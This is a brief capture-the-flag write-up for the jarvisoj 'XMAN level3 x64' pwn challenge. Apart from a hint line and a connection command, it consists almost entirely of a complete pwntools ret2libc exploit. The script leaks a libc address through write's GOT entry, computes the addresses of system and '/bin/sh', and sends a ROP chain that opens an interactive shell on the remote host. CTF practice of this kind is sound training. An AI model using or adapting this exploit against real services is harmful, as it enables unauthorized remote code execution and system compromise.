[XMAN]level3(x64)

nc pwn2.jarvisoj.com 9883

 

 

Hint1: 本题附件已更新，请大家重新下载以免影响解题。

 

level3_x64.rar.9169aec8b6cb4bfc3a0f5c50a7519004

 

64位ret2libc

exp如下：

from pwn import *

#io = process('./level3_x64')
io = remote('pwn2.jarvisoj.com', 9883)
elf = ELF('./level3_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')
pop_rdi = 0x4006b3
pop_rsi_r15 = 0x4006b1
write_plt = 0x4004B0
write_got = 0x600A58
vuln_addr = 0x4005E6

payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload += p64(0) + p64(write_plt) + p64(vuln_addr)
io.recvuntil('Input:\n')
io.send(payload)
write_addr = u64(io.recv(8))
info("write_addr:" + str(hex(write_addr)))
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + str(hex(libc_base)))
system_addr = libc.symbols['system'] + libc_base
info("system_addr:" + str(hex(system_addr)))
binsh_addr = next(libc.search(b'/bin/sh')) + libc_base
info("binsh_addr" + str(hex(binsh_addr)))
payload = b'a' * 136 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
io.recvuntil('Input:\n')
io.send(payload)

io.interactive()